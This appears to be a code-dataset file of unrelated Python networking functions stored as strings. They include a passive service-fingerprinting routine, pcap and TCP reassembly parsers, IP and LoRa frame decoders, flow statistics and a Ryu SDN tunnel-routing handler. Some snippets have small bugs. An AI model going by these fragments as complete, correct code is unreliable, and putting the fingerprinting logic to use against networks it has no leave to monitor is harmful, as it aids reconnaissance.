0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n 
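The long if/elif chain above keys each service guess off a UDP port plus a payload marker and reports it once per source. A compact, stand-alone sketch of that same table-driven idea using the dpkt library follows; the ports, markers, and labels in the signature table are illustrative placeholders, not the original rule set.

# Hedged sketch: table-driven UDP payload fingerprinting with dpkt.
# The signature tuples below are examples only, not the original rules.
import socket
import dpkt

UDP_SIGNATURES = [
    # (destination port, payload marker, label) -- placeholder entries
    (5061, b'.vonage.net:5061>', 'sip/vonage_server'),
    (24441, b'User:', 'pyzor/client'),
    (27015, b'Source Engine Query', 'halflife/client'),
]

def fingerprint_udp(pcap_path):
    reported = set()
    with open(pcap_path, 'rb') as fh:
        for _ts, buf in dpkt.pcap.Reader(fh):
            eth = dpkt.ethernet.Ethernet(buf)
            if not isinstance(eth.data, dpkt.ip.IP) or eth.data.p != dpkt.ip.IP_PROTO_UDP:
                continue
            ip = eth.data
            udp = ip.data
            payload = bytes(udp.data)
            for port, marker, label in UDP_SIGNATURES:
                key = (ip.src, udp.dport, label)
                if udp.dport == port and marker in payload and key not in reported:
                    reported.add(key)
                    print(socket.inet_ntoa(ip.src), 'UDP_%d' % udp.dport, 'open', label)

Each (source IP, port, label) triple is printed only once, mirroring the LiveUDPService/LiveUDPClient bookkeeping in the snippet above.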
continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def parse_packet(packet, recipient_type, pkt_type, exp_src, exp_dst, step):\n\n packet_count = 0\n expected_packet_count = PKT_COUNT\n\n # Calling check_packet helper function to determine how many packets are\n # correctly received. Function returns packet_count\n packet_count = check_packet(\n packet, recipient_type, pkt_type, exp_src, exp_dst)\n\n # Print packet count at each host\n print(\"Packet count at {} was {}\".format(recipient_type, packet_count))\n\n # Store packet_counts in global dict RECEIVED_PKT_DICT\n # Dict needed for ECMP check\n RECEIVED_PKT_DICT[recipient_type] = packet_count", "def __parse_tree(self, packet):\n info = extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n 
##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow 
ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = 
parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def _decode_frame(self):\n\n self._processed.eth_frame.log(level=logging_helper.INFO)\n\n # Parse IP packets, protocol=0x8\n if hex(self._processed.eth_frame.protocol) == u'0x8':\n self._processed.ip_frame = IPFrame(self._processed.eth_frame.payload)\n self._processed.ip_frame.log(level=logging_helper.INFO)\n\n if self._processed.ip_frame.payload is not None:\n self._processed.ip_frame.payload.log(level=logging_helper.INFO)\n\n else:\n logging.info(u'Not an IP payload')\n\n logging.info(self._processed)", "def _decode(self):\n \n self.version = int(data_to_hex_str(self.packet[0])[2])\n self.header_len = int(data_to_hex_str(self.packet[0])[3]) * 4\n self.type_of_service = data_to_hex_str(self.packet[1:2])\n self.total_len = int(data_to_hex_str(self.packet[2:4]), 16)\n self.id = data_to_hex_str(self.packet[4:6])\n \n #parse the flags fields(reservedbit, don't fragment, more fragment)\n if ((ord(self.packet[6]) & (1 << 7)) != 0):\n self.flags_reservedbit = 1\n else:\n self.flags_reservedbit = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 6)) != 0):\n self.flags_dont_fragment = 1\n else:\n self.flags_dont_fragment = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 5)) != 0):\n self.flags_more_fragment = 1\n else:\n self.flags_more_fragment = 0\n #endof if\n \n #parse the offset field(in packet[6:7]): 00011111 & packet[6] (to filter flags) -->> get packet[6:7] in hex_str\n #tmp = str(31 & ord(self.packet[6]))\n self.fragment_offset = int(data_to_hex_str(self.packet[6:8]), 16)\n if (self.fragment_offset >= (1 << 13)):\n #take away the flags fields: 00011111 11111111 & self.fragment_offset\n self.fragment_offset = self.fragment_offset & ((1 << 13) - 1) \n \n self.TTL = ord(self.packet[8])\n self.protocol = IPPROTO[ord(self.packet[9])]\n self.header_checksum = data_to_hex_str(self.packet[10:12])\n \n self.src = str(ord(self.packet[12])) + '.' + str(ord(self.packet[13])) + '.' + \\\n str(ord(self.packet[14])) + '.' + str(ord(self.packet[15]))\n self.dst = str(ord(self.packet[16])) + '.' + str(ord(self.packet[17])) + '.' + \\\n str(ord(self.packet[18])) + '.' 
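The controller handler above repeatedly assembles an OFPFlowMod from a match, an action list, a table id, and a priority. A minimal sketch of that recurring pattern for a Ryu OpenFlow 1.3 app is below; it assumes a connected Datapath object (dp) supplied by Ryu, and the commented example match/actions mirror the generic "punt IPv4 to the controller" rule rather than any specific tunnel or routing rule.

# Hedged sketch of the flow-installation pattern used throughout the handler above
# (Ryu, OpenFlow 1.3). `dp` is the Datapath handed to the app by Ryu; priority,
# table_id and the example match are placeholders.
def install_flow(dp, priority, match, actions, table_id=0):
    ofp = dp.ofproto
    parser = dp.ofproto_parser
    inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]
    mod = parser.OFPFlowMod(datapath=dp, priority=priority, match=match,
                            instructions=inst, table_id=table_id)
    dp.send_msg(mod)

# Example use inside a packet-in handler: send every IPv4 packet to the controller.
# parser = dp.ofproto_parser
# ofp = dp.ofproto
# match = parser.OFPMatch(eth_type=0x0800)
# actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]
# install_flow(dp, priority=2, match=match, actions=actions)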
+ str(ord(self.packet[19]))\n \n if (self.header_len > 20):\n self.opt_paddings = self.packet[20 : (self.header_len)]", "def process(self, pkt):\n pass", "def parse_frame(data):\n test = binascii.hexlify(data)\n # defines the format of received LoRa frame header\n tap_header_format = 'bbhiibbbbib'\n phy_header_format = 'bbb'\n header_format = tap_header_format + phy_header_format\n print header_format\n header_len = struct.calcsize(header_format)\n data_len = len(data)\n if header_len > data_len:\n print 'packet too short'\n return (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,)\n else:\n # defines the frame format based on header and length of frame\n data_format = header_format + str(data_len - header_len) + 's'\n print data_format\n # print \"tap header: \", header_len\n # print \"data length: \", data_len\n # print \"test length: \", len(test)\n\n unpacked = struct.unpack(data_format, data)\n print unpacked\n # print '-----------------------------------------------------'\n # print \"bin \" + data\n # print 'hex ' + test\n return unpacked", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size 
= len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, 